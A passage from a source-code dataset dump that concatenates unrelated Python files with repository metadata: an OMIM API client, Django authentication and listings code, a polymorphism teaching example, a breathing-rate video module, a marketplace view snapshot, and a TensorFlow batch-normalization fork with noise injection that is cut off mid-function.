response = json.loads(req.get(handyurl,params=self.pars).text)
except ValueError:
response = None
return response
def geneMap_by_att(self,response,attribute):
# returns a list of results by desired geneMap attribute
res = list()
if response is not None:
for genemap in response["omim"]["listResponse"]["geneMapList"]:
res.append(genemap["geneMap"][attribute])
return res
def omim_by_location(self,chr,start,end):
handyurl = self.url + "/geneMap"
self.pars["chromosome"] = chr
# WHY DOESN'T THIS WORK?
#self.pars["chromosomeLocationStart"] = start
#self.pars["chromosomeLocationEnd"] = end
response = self.get_req(handyurl)
return self.geneMap_by_att(response,"mimNumber")
def omim_by_chr(self,chr):
handyurl = self.url + "/geneMap"
self.pars["chromosome"] = chr
response = self.get_req(handyurl)
return self.geneMap_by_att(response,"mimNumber")
def all_omim(self):
handyurl = self.url + "/geneMap"
response = self.get_req(handyurl)
return self.geneMap_by_att(response,"mimNumber")
def sym_by_omim(self,omim):
handyurl = self.url + "/geneMap"
self.pars["mimNumber"] = omim
response = self.get_req(handyurl)
return self.geneMap_by_att(response,"geneSymbols")
def variant_by_omim(self,omim):
handyurl = self.url + "/entry/allelicVariantList"
self.pars["mimNumber"] = omim
response = self.get_req(handyurl)
return response
class Pheno():
# get information for a given phenotype
def __init__(self,apikey,url="http://api.omim.org/api"):
self.key = apikey
self.pars = {"apiKey" : self.key}
self.url = url
def get_req(self,handyurl):
return json.loads(req.get(handyurl,params=self.pars).text)
def get_genes(self,omim):
# takes an omim phenotype number and gets the genes associated with it
handyurl = self.url + "/entry"
self.pars["mimNumber"] = omim
self.pars["include"] = "geneMap"
xml = req.get(handyurl,params=self.pars).text
res = dict() # use keys to sort unique
try: # xml provided back (errors provide html)
elem = ET.fromstring(xml)
for symbols in elem.iter(tag="geneSymbols"):
for sym in symbols.text.split(", "):
res[sym] = None
if len(res.keys()) == 0:
return None
except: # html error returned
return "Error"
return res.keys()
def pheno_series(self,omim):
# takes a omim number and queries for the phenotypicSeries
handyurl = self.url + "/entry"
self.pars["mimNumber"] = omim
self.pars["include"] = "all"
xml = req.get(handyurl,params=self.pars).text
elem = ET.fromstring(xml)
for series in elem.iter(tag="phenotypicSeriesMimNumber"):
print series.text
return
class Search():
def __init__(self,apikey,url="http://api.omim.org/api"):
self.key = apikey
self.url = url # url without handler
self.pars = {"apiKey" : self.key}
def omim_by_search(self,terms):
# input is a string of space separated search terms
handyurl = self.url + "/entry/search"
self.pars["search"] = terms
response = req.get(handyurl,params=self.pars).text
res = self.omim_from_xml(response)
return res
def omim_from_xml(self,xml):
# get the omim ids from a returned xml (search)
try:
elem = ET.fromstring(xml)
res = list()
for omim in elem.iter(tag="mimNumber"):
res.append(omim.text)
except:
print "\nerror at omim_from_xml, not valid xml.\n"
print xml+"\n"
return list()
return res | [
"jason.j.evans@gmail.com"
] | jason.j.evans@gmail.com |
a1eeaddd15d2c948ed131f7a126f1ce98e9c1c6c | c8f023c1e2c9ecb9ffe328044ef3f013de0857a7 | /src/apps/authentication/views.py | 2523e22d739640c45818632c83a2d47a605d0269 | [
"MIT"
] | permissive | snicoper/django-boilerplate | 851932459fca8b4a6c9220d8ad3ca8f94b14b7a2 | 88cc24c3a2e935fd1be139368288cae6c38679e4 | refs/heads/master | 2021-01-18T18:40:36.633342 | 2018-10-15T07:54:59 | 2018-10-15T07:54:59 | 29,604,293 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,839 | py | from django.conf import settings
from django.contrib import messages
from django.contrib.auth import get_user_model, views
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.sites.shortcuts import get_current_site
from django.shortcuts import get_object_or_404, redirect, render
from django.urls import reverse, reverse_lazy
from django.utils.translation import ugettext as _
from django.views import generic
from utils.http import get_full_path
from utils.mail import send_templated_mail
from utils.mixins.views import AnonymousRequiredMixin
from .forms import AuthenticationForm, RegisterUserForm, UserEmailUpdateForm
from .models import RegisterUser, UserEmailUpdate
UserModel = get_user_model()
class RegisterUserFormView(AnonymousRequiredMixin, generic.CreateView):
template_name = 'authentication/register.html'
form_class = RegisterUserForm
model = RegisterUser
def __init__(self, *args, **kwargs):
"""Elimina posibles usuarios expirados."""
RegisterUser.objects.delete_expired_users_temp()
super().__init__(*args, **kwargs)
def get_success_url(self):
"""Si todo OK, envía el email para verificación y redirecciona."""
self._send_email_with_token()
return reverse('authentication:success')
def _send_email_with_token(self):
"""Envía un email con token para terminar proceso de registro."""
current_site = get_current_site(self.request)
site_name = current_site.name
url_validate_token = get_full_path(
self.request,
'authentication:validate_token',
token=self.object.token
)
context = {
'username': self.object.username,
'email': self.object.email,
'site_name': site_name,
'url_validate_token': url_validate_token
}
send_templated_mail(
subject=_(f'Validación de email en {site_name}'),
from_email=settings.GROUP_EMAILS['NO-REPLY'],
recipients=[self.object.email],
context=context,
template_text='authentication/emails/register_success.txt'
)
class RegisterUserSuccessView(AnonymousRequiredMixin, generic.TemplateView):
template_name = 'authentication/success.html'
class RegisterUserValidateTokenView(AnonymousRequiredMixin, generic.TemplateView):
"""Validación email de un nuevo registro a través del token."""
template_name = 'authentication/validate_token.html'
def get(self, request, *args, **kwargs):
RegisterUser.objects.delete_expired_users_temp()
token = self.kwargs.get('token')
try:
user_temp = RegisterUser.objects.get(token=token)
except RegisterUser.DoesNotExist:
return render(request, 'authentication/token_not_exists.html')
RegisterUser.objects.move_user_tmp_to_users(UserModel, user_temp)
messages.success(request, _('El registro se ha completado con éxito'))
return redirect(reverse('authentication:login'))
class LoginView(AnonymousRequiredMixin, views.LoginView):
template_name = 'authentication/login.html'
form_class = AuthenticationForm
class LogoutView(LoginRequiredMixin, views.LogoutView):
template_name = 'authentication/logged_out.html'
class PasswordResetView(AnonymousRequiredMixin, views.PasswordResetView):
template_name = 'authentication/password_reset_form.html'
email_template_name = 'authentication/emails/password_reset_email.html'
subject_template_name = 'authentication/emails/password_reset_subject.txt'
success_url = reverse_lazy('authentication:password_reset_done')
class PasswordResetDoneView(AnonymousRequiredMixin, views.PasswordResetDoneView):
template_name = 'authentication/password_reset_done.html'
class PasswordResetConfirmView(AnonymousRequiredMixin, views.PasswordResetConfirmView):
template_name = 'authentication/password_reset_confirm.html'
success_url = reverse_lazy('authentication:password_reset_complete')
class PasswordResetCompleteView(AnonymousRequiredMixin, views.PasswordResetCompleteView):
template_name = 'authentication/password_reset_complete.html'
class PasswordChangeView(views.PasswordChangeView):
template_name = 'authentication/password_change_form.html'
success_url = reverse_lazy('authentication:password_change_done')
class PasswordChangeDoneView(views.PasswordChangeDoneView):
template_name = 'authentication/password_change_done.html'
class UserEmailUpdateView(LoginRequiredMixin, generic.FormView):
template_name = 'authentication/email_update.html'
form_class = UserEmailUpdateForm
model = UserEmailUpdate
def get_initial(self):
"""Establece datos en los campos del form."""
initial = super().get_initial()
initial['user'] = self.request.user.id
initial['token'] = UserEmailUpdate.objects.generate_unique_token()
initial['new_email'] = self.request.user.email
return initial
def form_valid(self, form):
"""Envía el email de confirmación."""
new_email = form.cleaned_data['new_email']
token = form.cleaned_data['token']
UserEmailUpdate.objects.update_or_create(
defaults={'new_email': new_email, 'token': token},
user=self.request.user
)
self._send_confirm_email_for_validate(token, new_email)
return super().form_valid(form)
def get_success_url(self):
msg = _('Se ha enviado un email a la nueva dirección para la confirmación')
messages.success(self.request, msg)
return reverse('accounts:profile')
def _send_confirm_email_for_validate(self, token, new_email):
"""Envía un email para la confirmación del nuevo email con un token."""
current_site = get_current_site(self.request)
url_validate_token = get_full_path(
self.request,
'authentication:email_update_validate',
token=token
)
context = {
'url_validate_token': url_validate_token,
'site_name': current_site.name
}
send_templated_mail(
subject=_('Confirmación cambio de email'),
from_email=settings.GROUP_EMAILS['NO-REPLY'],
recipients=[new_email],
context=context,
template_text='authentication/emails/email_update_confirm.txt'
)
class UserEmailUpdateValidateView(LoginRequiredMixin, generic.View):
"""Verifica el token de cambio de email.
Para mayor seguridad, el usuario ha de estar logueado.
Una vez comprobado y actualizado el nuevo email, elimina el
email temporal.
"""
def get(self, request, *args, **kwargs):
"""Comprueba el token que coincida."""
token = kwargs.get('token')
try:
email_update = UserEmailUpdate.objects.get(token=token, user=request.user)
except UserEmailUpdate.DoesNotExist:
return redirect('authentication:token_email_not_exists')
self.request.user.email = email_update.new_email
self.request.user.save()
email_update.delete()
messages.success(request, _('Se ha actualizado el email'))
return redirect(reverse('accounts:profile'))
class UserEmailUpdateNotFoundView(generic.TemplateView):
"""El token no existe o no pertenece al usuario."""
template_name = 'authentication/token_email_not_exists.html'
class UserRemoveEmailUpdateView(generic.View):
"""Eliminar un email no confirmado por parte del usuario."""
def post(self, request, *args, **kwargs):
get_object_or_404(UserEmailUpdate, user=request.user).delete()
messages.success(request, _('Email eliminado con éxito'))
return redirect(reverse('accounts:profile'))
| [
"snicoper@gmail.com"
] | snicoper@gmail.com |
35e18800b81d35fa9973f7655fda15f7e69df8ad | f90ae105f8a55c26df0b30432312aea5b0a802ff | /oop_多态.py | c017fc479d8423f11599f096e855a6f233075242 | [] | no_license | zhaijingzhen/crazypython | 10ee6703394c32bccceaa459ebcf38789cb54a5b | cbbb7fb930aa76e649857d85e3c79840207d9752 | refs/heads/master | 2021-01-06T14:22:46.118674 | 2020-02-18T12:49:14 | 2020-02-18T12:49:14 | 241,358,654 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 767 | py | #面向对象三大特征:封装(定义类的过程)、多态、继承
#多态 同一方法在不同的类中,有不同的功能
#数字类
#1+1
#字符串类
#'1'+'1'
class Triangle:
def __init__(self,width,height): #初始化
self.width = width
self.height = height
def getArea(self):
area = self.width * self.height /2
return area
class Square:
def __init__(self,size): #初始化
self.size = size
def getArea(self):
area = self.size * self.size
return area
a = Triangle(6,8)
print(a.getArea())
b = Square(9)
print(b.getArea())
#以上代码实现了,getArea方法在两个不同的类中,使用了不同的方法,这就是多态
| [
"noreply@github.com"
] | zhaijingzhen.noreply@github.com |
03556908a641b7f1722eee090e9e4b0fd97f67f0 | 591832a19a36d061004873e3818ef3e141322aba | /alternatives/BreathingRateDetection/modules.py | f7b6079ff572a3d49514360be03dad989ea351a5 | [] | no_license | amhfmnn/Breathing | ff7fddaf039964cd66092b0a0e4abc8359cbf51a | 9c0732b95767d15c940151993f5ca08b749ad4dc | refs/heads/master | 2020-04-30T22:27:45.111348 | 2019-06-24T11:39:48 | 2019-06-24T11:39:48 | 177,120,383 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,245 | py | """
Contains all the bindings to the modules.
To change the backend of a module, alter the _modules dict accordingly
"""
import cv2
import numpy as np
from parameters import getParam
from buildpyr import buildPyr
def getRegion(frames):
print(frames.shape)
#Selection region of interest in the video stream
rect_img = frames[(400, 700)[1]: (900, 1080)[1], (400, 700)[0]: (900, 1080)[0]]
print("new Shape")
print(rect_img.shape)
return rect_img
#Crop the Sample of Frames which are used for compution
def crop(frames, boundingRects):
return frames, boundingRects
def preProcess(vid):
print("New shape=")
print(vid.shape)
vid2 = []
idx = getParam["pyramidLevel"]
depth = getParam["pyramidDepth"]
for i in range(vid.shape[0]):
img2 = cv2.cvtColor(vid[i],cv2.COLOR_BGR2GRAY)
lpr, gpr = buildPyr(img2,depth)
vid2.append(lpr[idx])
vid = np.array(vid2)
return vid
from fft import *
_modules = {
"RegionOfInterest": getRegion,
"Crop": crop,
"PreProcessing": preProcess,
"Fourier Transform": applyFFT,
"Band Pass": bandPass,
"Select Frequency": searchFreq,
}
def getModule(modName):
return _modules[modName]
| [
"amin.hofmann@guest.hpi.de"
] | amin.hofmann@guest.hpi.de |
3d29a9eb23ae4bb4f0465775640ecd43fee68587 | e559ea08e3e0be40dbc7ec305613f5d2ed8f286c | /custdet.py | 987d261443fae212c529840992302accd626aeeb | [] | no_license | chinnuts/petro-tech | 24e5cea072de2a3d77cd4fa4c9d14d5561cf9bc8 | 166360dcbe4e3ed61bb076f4b6adbea234900af6 | refs/heads/main | 2023-06-09T17:11:01.086048 | 2021-07-01T04:35:57 | 2021-07-01T04:35:57 | 377,558,029 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 104 | py | num=int(input("enter a number"))
if num%2==0:
print("is even number")
else:
print("is odd number") | [
"noreply@github.com"
] | chinnuts.noreply@github.com |
18cca05e8062f4f535054f5fd1a51304be50beb2 | 052275c2dd6d59a0d0fcfe85591b44106343662b | /listings/urls.py | a3b13c17beedfeffab4f7f72383dfe1ae84efa0b | [] | no_license | nimadorostkar/Django-Real-Estate | 93d104ad1847674103e525ae428af186fffa9e30 | bf868e49bb4703e4081d8e7e9fd5e3ae23fc9af9 | refs/heads/master | 2023-08-10T17:07:29.829253 | 2021-09-19T10:55:47 | 2021-09-19T10:55:47 | 338,533,461 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 281 | py | from django.urls import path
from .views import (ListingListView, ListingDetailView, search)
urlpatterns = [
path('', ListingListView.as_view(), name='listings'),
path('<int:pk>', ListingDetailView.as_view(), name='listing'),
path('search', search, name='search'),
]
| [
"nimadorostkar97@gmail.com"
] | nimadorostkar97@gmail.com |
2cda3853e761f6d519daa85cf1d79d90c0d87cc9 | a76401f82ed1c9ac47ddaff27681b90f37627426 | /.history/student_olx/main/views_20210924131359.py | 35fb68992b698ce129f2c918d7cfea964bc30afc | [] | no_license | RiteshK555/itw-project | e90e1dd13517ee8b07d72cc3bd5a42af367ab587 | a2e4c8682c2030ff77da9ade5ae4677bd475f87a | refs/heads/master | 2023-08-30T03:48:58.904979 | 2021-11-10T09:50:59 | 2021-11-10T09:50:59 | 410,032,076 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,329 | py | from django.http.response import HttpResponseRedirect
from django.shortcuts import render,redirect
from .models import product
from registration.models import money
# Create your views here.
from django.http import HttpResponse
from .forms import CreateNewProduct
# def buy(request,id):
# if request.method == 'POST':
# print(id)
# return render(request,"main/home.html")
def index(request,id):
a_product=product.objects.get(id=id)
all_products=product.objects.all()
buyer_money=money(holder=request.user)
# buyer_money=buyer_money-
return render(request,"main/home.html",{"products":all_products})
def home(response):
all_products=product.objects.all()
return render(response,"main/home.html",{"products":all_products})
def sell(response):
if response.method == "POST":
form=CreateNewProduct(response.POST,response.FILES)
if form.is_valid():
form.save()
# p_n=form.cleaned_data["product_name"]
# d=form.cleaned_data["description"]
# m=product(product_name=p_n,description=d)
# m.save()
return render(response,"main/home.html")
else:
form=CreateNewProduct()
return render(response,"main/sell.html",{"form":form})
def buy(response):
return render(response,"main/buy.html",{})
| [
""
] | |
56003591278ea79bc261ec1237431cd6e010f8ae | c3c558f6c4e85997499551f202e507e3aca0ccf5 | /resources/Tipo_Resource.py | a56930bf3da7204fedcd622274016948c60ac631 | [] | no_license | DanielFerreira11/DASHBOARD-MASTER | 869a861094bce28e8cf1f81fc6c3f19f6b6e6efb | 448ee21b696a0e091a9175d620e27473bb31b6fd | refs/heads/master | 2020-06-01T12:20:22.182597 | 2019-06-07T16:50:01 | 2019-06-07T16:50:01 | 190,777,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | #Fazendo consultas do numero de acidentes por tipo de veículo
from flask_restful import Resource, marshal_with, abort
from database.PgConector import *
class Tipo_Veiculo(Resource):
# GET Acidentes
def get(self):
sql = 'select tipo_veiculo, count(tipo_veiculo) from public."MyData" group by tipo_veiculo'
#Consulta SQL
cur.execute(sql)
acidentePesquisa = cur.fetchall()
#acidentePesquisa = cur.fetchall()[0]
return acidentePesquisa
| [
"noreply@github.com"
] | DanielFerreira11.noreply@github.com |
8192fb51ed0b55daa40bef01c2f160c9fdcc29e5 | 0a414f7514099328799805c5e8b0d5668a6c040d | /models.py | c3321bb9e3a0bd426b791774a71c365a173316b3 | [] | no_license | mkabelitz/ladder | 8118d9519ec7084720470f7910a8496e728521a0 | d4d6943a2abc7931276080aa0ab573d5fd9a6da3 | refs/heads/master | 2021-01-16T18:55:05.024897 | 2017-09-25T09:59:09 | 2017-09-25T09:59:09 | 100,124,146 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 35,852 | py | import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.contrib.framework.python.ops import add_arg_scope
from tensorflow.contrib.framework.python.ops import variables
from tensorflow.contrib.layers.python.layers import initializers
from tensorflow.contrib.layers.python.layers import utils
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.layers import convolutional as convolutional_layers
from tensorflow.python.layers import core as core_layers
from tensorflow.python.layers import normalization as normalization_layers
from tensorflow.python.layers import pooling as pooling_layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import standard_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as tf_variables
from tensorflow.python.training import moving_averages
def batch_normalization(x,
                        mean,
                        variance,
                        offset,
                        scale,
                        variance_epsilon,
                        name=None,
                        noise_std=None):
  """Batch normalization with optional additive Gaussian corruption.

  Behaves like `tf.nn.batch_normalization` (http://arxiv.org/abs/1502.03167):
  normalizes `x` by `mean` and `variance`, then optionally applies `scale`
  (gamma) and `offset` (beta).  The single extension is `noise_std`: when it
  is truthy, zero-mean Gaussian noise with that standard deviation is added
  to `x` *before* the affine normalization is applied (used for the
  corrupted-encoder path of the ladder network).

  `mean`, `variance`, `offset` and `scale` must broadcast against `x`; see
  `tf.nn.batch_normalization` for the accepted shapes.

  Args:
    x: Input `Tensor` of arbitrary dimensionality.
    mean: A mean `Tensor`.
    variance: A variance `Tensor`.
    offset: Beta `Tensor` added after normalization, or `None`.
    scale: Gamma `Tensor` the normalized value is multiplied by, or `None`.
    variance_epsilon: Small float added to `variance` to avoid division by 0.
    name: Optional name for the op scope.
    noise_std: Optional stddev of Gaussian noise injected into `x`.

  Returns:
    The normalized, scaled, offset (and possibly noise-corrupted) tensor.
  """
  with ops.name_scope(name, "batchnorm", [x, mean, variance, scale, offset]):
    # Fold gamma into the reciprocal standard deviation so the whole affine
    # transform is a single multiply-add.
    inv_std = math_ops.rsqrt(variance + variance_epsilon)
    if scale is not None:
      inv_std *= scale
    if noise_std:
      x = _noise(x, noise_std)
    if offset is not None:
      shift = offset - mean * inv_std
    else:
      shift = -mean * inv_std
    return x * inv_std + shift
@slim.layers.add_arg_scope
def custom_batch_norm(inputs,
                      decay=0.999,
                      center=True,
                      scale=False,
                      epsilon=0.001,
                      activation_fn=None,
                      param_initializers=None,
                      param_regularizers=None,
                      updates_collections=ops.GraphKeys.UPDATE_OPS,
                      is_training=True,
                      reuse=None,
                      variables_collections=None,
                      outputs_collections=None,
                      trainable=True,
                      batch_weights=None,
                      data_format='NHWC',
                      zero_debias_moving_mean=False,
                      scope=None,
                      renorm=False,
                      renorm_clipping=None,
                      renorm_decay=0.99,
                      noise_std=None):
  """Adds a Batch Normalization layer from http://arxiv.org/abs/1502.03167.

  This is a local fork of ``tf.contrib.layers.batch_norm`` with two
  modifications:

    * the ``fused`` code path of the original has been removed, and
    * an extra ``noise_std`` argument is threaded through to the custom
      ``batch_normalization`` op defined above, which injects additive
      Gaussian noise into the activations (corrupted encoder of the
      ladder network).

  "Batch Normalization: Accelerating Deep Network Training by Reducing
  Internal Covariate Shift", Sergey Ioffe, Christian Szegedy

  Can be used as a normalizer function for conv2d and fully_connected.

  Note: when training, the moving_mean and moving_variance need to be updated.
  By default the update ops are placed in `tf.GraphKeys.UPDATE_OPS`, so they
  need to be added as a dependency to the `train_op`. For example:

  ```python
    update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
    with tf.control_dependencies(update_ops):
      train_op = optimizer.minimize(loss)
  ```

  One can set updates_collections=None to force the updates in place, but that
  can have a speed penalty, especially in distributed settings.

  Args:
    inputs: A tensor with 2 or more dimensions, where the first dimension has
      `batch_size`. The normalization is over all but the last dimension if
      `data_format` is `NHWC` and the second dimension if `data_format` is
      `NCHW`.
    decay: Decay for the moving average. Reasonable values for `decay` are close
      to 1.0, typically in the multiple-nines range: 0.999, 0.99, 0.9, etc.
      Lower `decay` value (recommend trying `decay`=0.9) if model experiences
      reasonably good training performance but poor validation and/or test
      performance. Try zero_debias_moving_mean=True for improved stability.
    center: If True, add offset of `beta` to normalized tensor. If False, `beta`
      is ignored.
    scale: If True, multiply by `gamma`. If False, `gamma` is
      not used. When the next layer is linear (also e.g. `nn.relu`), this can be
      disabled since the scaling can be done by the next layer.
    epsilon: Small float added to variance to avoid dividing by zero.
    activation_fn: Activation function, default set to None to skip it and
      maintain a linear activation.
    param_initializers: Optional initializers for beta, gamma, moving mean and
      moving variance.
    param_regularizers: Optional regularizer for beta and gamma.
    updates_collections: Collections to collect the update ops for computation.
      The updates_ops need to be executed with the train_op.
      If None, a control dependency would be added to make sure the updates are
      computed in place.
    is_training: Whether or not the layer is in training mode. In training mode
      it would accumulate the statistics of the moments into `moving_mean` and
      `moving_variance` using an exponential moving average with the given
      `decay`. When it is not in training mode then it would use the values of
      the `moving_mean` and the `moving_variance`.
    reuse: Whether or not the layer and its variables should be reused. To be
      able to reuse the layer scope must be given.
    variables_collections: Optional collections for the variables.
    outputs_collections: Collections to add the outputs.
    trainable: If `True` also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
    batch_weights: An optional tensor of shape `[batch_size]`,
      containing a frequency weight for each batch item. If present,
      then the batch normalization uses weighted mean and
      variance. (This can be used to correct for bias in training
      example selection.)
    data_format: A string. `NHWC` (default) and `NCHW` are supported.
    zero_debias_moving_mean: Use zero_debias for moving_mean. It creates a new
      pair of variables 'moving_mean/biased' and 'moving_mean/local_step'.
    scope: Optional scope for `variable_scope`.
    renorm: Whether to use Batch Renormalization
      (https://arxiv.org/abs/1702.03275). This adds extra variables during
      training. The inference is the same for either value of this parameter.
    renorm_clipping: A dictionary that may map keys 'rmax', 'rmin', 'dmax' to
      scalar `Tensors` used to clip the renorm correction. The correction
      `(r, d)` is used as `corrected_value = normalized_value * r + d`, with
      `r` clipped to [rmin, rmax], and `d` to [-dmax, dmax]. Missing rmax, rmin,
      dmax are set to inf, 0, inf, respectively.
    renorm_decay: Momentum used to update the moving means and standard
      deviations with renorm. Unlike `momentum`, this affects training
      and should be neither too small (which would add noise) nor too large
      (which would give stale estimates). Note that `decay` is still applied
      to get the means and variances for inference.
    noise_std: Optional stddev of Gaussian noise injected into the
      activations by the custom `batch_normalization` call. NOTE(review):
      the noise is only applied on the legacy code path below; the core
      layer-class fast path ignores it (see inline note) -- confirm callers
      force the legacy path (e.g. `updates_collections=None`) when noise is
      wanted.

  Returns:
    A `Tensor` representing the output of the operation.

  Raises:
    ValueError: If `renorm` is True while the legacy implementation is
      selected (i.e. `batch_weights` is set, a custom `updates_collections`
      is used, or `zero_debias_moving_mean` is True).
    ValueError: If the rank of `inputs` is undefined.
    ValueError: If the channels dimension of `inputs` is undefined.
  """
  layer_variable_getter = slim.layers._build_variable_getter()
  with variable_scope.variable_scope(
      scope, 'BatchNorm', [inputs], reuse=reuse,
      custom_getter=layer_variable_getter) as sc:
    inputs = ops.convert_to_tensor(inputs)
    # Determine whether we can use the core layer class.
    if (batch_weights is None and
        updates_collections is ops.GraphKeys.UPDATE_OPS and
        not zero_debias_moving_mean):
      # Use the core layer class.
      # NOTE(review): this fast path never receives `noise_std`; noise
      # injection only happens in the legacy branch further below.
      axis = 1 if data_format == 'NCHW' else -1
      if not param_initializers:
        param_initializers = {}
      beta_initializer = param_initializers.get('beta',
                                                init_ops.zeros_initializer())
      gamma_initializer = param_initializers.get('gamma',
                                                 init_ops.ones_initializer())
      moving_mean_initializer = param_initializers.get(
          'moving_mean', init_ops.zeros_initializer())
      moving_variance_initializer = param_initializers.get(
          'moving_variance', init_ops.ones_initializer())
      if not param_regularizers:
        param_regularizers = {}
      beta_regularizer = param_regularizers.get('beta')
      gamma_regularizer = param_regularizers.get('gamma')
      layer = normalization_layers.BatchNormalization(
          axis=axis,
          momentum=decay,
          epsilon=epsilon,
          center=center,
          scale=scale,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer,
          moving_mean_initializer=moving_mean_initializer,
          moving_variance_initializer=moving_variance_initializer,
          beta_regularizer=beta_regularizer,
          gamma_regularizer=gamma_regularizer,
          trainable=trainable,
          renorm=renorm,
          renorm_clipping=renorm_clipping,
          renorm_momentum=renorm_decay,
          name=sc.name,
          _scope=sc,
          _reuse=reuse)
      outputs = layer.apply(inputs, training=is_training)
      # Add variables to collections.
      slim.layers._add_variable_to_collections(
          layer.moving_mean, variables_collections, 'moving_mean')
      slim.layers._add_variable_to_collections(
          layer.moving_variance, variables_collections, 'moving_variance')
      if layer.beta:
        slim.layers._add_variable_to_collections(layer.beta, variables_collections, 'beta')
      if layer.gamma:
        slim.layers._add_variable_to_collections(
            layer.gamma, variables_collections, 'gamma')
      if activation_fn is not None:
        outputs = activation_fn(outputs)
      return utils.collect_named_outputs(outputs_collections,
                                         sc.original_name_scope, outputs)
    # Not supported by layer class: batch_weights argument,
    # and custom updates_collections. In that case, use the legacy BN
    # implementation.
    # Custom updates collections are not supported because the update logic
    # is different in this case, in particular w.r.t. "forced updates" and
    # update op reuse.
    if renorm:
      raise ValueError('renorm is not supported with batch_weights, '
                       'updates_collections or zero_debias_moving_mean')
    inputs_shape = inputs.get_shape()
    inputs_rank = inputs_shape.ndims
    if inputs_rank is None:
      raise ValueError('Inputs %s has undefined rank.' % inputs.name)
    dtype = inputs.dtype.base_dtype
    if batch_weights is not None:
      batch_weights = ops.convert_to_tensor(batch_weights)
      inputs_shape[0:1].assert_is_compatible_with(batch_weights.get_shape())
      # Reshape batch weight values so they broadcast across inputs.
      nshape = [-1] + [1 for _ in range(inputs_rank - 1)]
      batch_weights = array_ops.reshape(batch_weights, nshape)
    if data_format == 'NCHW':
      moments_axes = [0] + list(range(2, inputs_rank))
      params_shape = inputs_shape[1:2]
      # For NCHW format, rather than relying on implicit broadcasting, we
      # explicitly reshape the params to params_shape_broadcast when computing
      # the moments and the batch normalization.
      params_shape_broadcast = list(
          [1, inputs_shape[1].value] + [1 for _ in range(2, inputs_rank)])
    else:
      moments_axes = list(range(inputs_rank - 1))
      params_shape = inputs_shape[-1:]
      params_shape_broadcast = None
    if not params_shape.is_fully_defined():
      raise ValueError('Inputs %s has undefined channels dimension %s.' % (
          inputs.name, params_shape))
    # Allocate parameters for the beta and gamma of the normalization.
    beta, gamma = None, None
    if not param_initializers:
      param_initializers = {}
    if center:
      beta_collections = utils.get_variable_collections(variables_collections,
                                                        'beta')
      beta_initializer = param_initializers.get('beta',
                                                init_ops.zeros_initializer())
      beta = variables.model_variable('beta',
                                      shape=params_shape,
                                      dtype=dtype,
                                      initializer=beta_initializer,
                                      collections=beta_collections,
                                      trainable=trainable)
    if scale:
      gamma_collections = utils.get_variable_collections(variables_collections,
                                                         'gamma')
      gamma_initializer = param_initializers.get('gamma',
                                                 init_ops.ones_initializer())
      gamma = variables.model_variable('gamma',
                                       shape=params_shape,
                                       dtype=dtype,
                                       initializer=gamma_initializer,
                                       collections=gamma_collections,
                                       trainable=trainable)
    # Create moving_mean and moving_variance variables and add them to the
    # appropriate collections. We disable variable partitioning while creating
    # them, because assign_moving_average is not yet supported for partitioned
    # variables.
    partitioner = variable_scope.get_variable_scope().partitioner
    try:
      variable_scope.get_variable_scope().set_partitioner(None)
      moving_mean_collections = utils.get_variable_collections(
          variables_collections, 'moving_mean')
      moving_mean_initializer = param_initializers.get(
          'moving_mean', init_ops.zeros_initializer())
      moving_mean = variables.model_variable(
          'moving_mean',
          shape=params_shape,
          dtype=dtype,
          initializer=moving_mean_initializer,
          trainable=False,
          collections=moving_mean_collections)
      moving_variance_collections = utils.get_variable_collections(
          variables_collections, 'moving_variance')
      moving_variance_initializer = param_initializers.get(
          'moving_variance', init_ops.ones_initializer())
      moving_variance = variables.model_variable(
          'moving_variance',
          shape=params_shape,
          dtype=dtype,
          initializer=moving_variance_initializer,
          trainable=False,
          collections=moving_variance_collections)
    finally:
      variable_scope.get_variable_scope().set_partitioner(partitioner)
    # If `is_training` doesn't have a constant value, because it is a `Tensor`,
    # a `Variable` or `Placeholder` then is_training_value will be None and
    # `needs_moments` will be true.
    is_training_value = utils.constant_value(is_training)
    need_moments = is_training_value is None or is_training_value
    if need_moments:
      # Calculate the moments based on the individual batch.
      if batch_weights is None:
        if data_format == 'NCHW':
          mean, variance = nn.moments(inputs, moments_axes, keep_dims=True)
          mean = array_ops.reshape(mean, [-1])
          variance = array_ops.reshape(variance, [-1])
        else:
          mean, variance = nn.moments(inputs, moments_axes)
      else:
        if data_format == 'NCHW':
          mean, variance = nn.weighted_moments(inputs, moments_axes,
                                               batch_weights, keep_dims=True)
          mean = array_ops.reshape(mean, [-1])
          variance = array_ops.reshape(variance, [-1])
        else:
          mean, variance = nn.weighted_moments(inputs, moments_axes,
                                               batch_weights)
      moving_vars_fn = lambda: (moving_mean, moving_variance)
      if updates_collections is None:
        def _force_updates():
          """Internal function forces updates moving_vars if is_training."""
          update_moving_mean = moving_averages.assign_moving_average(
              moving_mean, mean, decay, zero_debias=zero_debias_moving_mean)
          update_moving_variance = moving_averages.assign_moving_average(
              moving_variance, variance, decay, zero_debias=False)
          with ops.control_dependencies([update_moving_mean,
                                         update_moving_variance]):
            return array_ops.identity(mean), array_ops.identity(variance)
        mean, variance = utils.smart_cond(is_training,
                                          _force_updates,
                                          moving_vars_fn)
      else:
        def _delay_updates():
          """Internal function that delay updates moving_vars if is_training."""
          update_moving_mean = moving_averages.assign_moving_average(
              moving_mean, mean, decay, zero_debias=zero_debias_moving_mean)
          update_moving_variance = moving_averages.assign_moving_average(
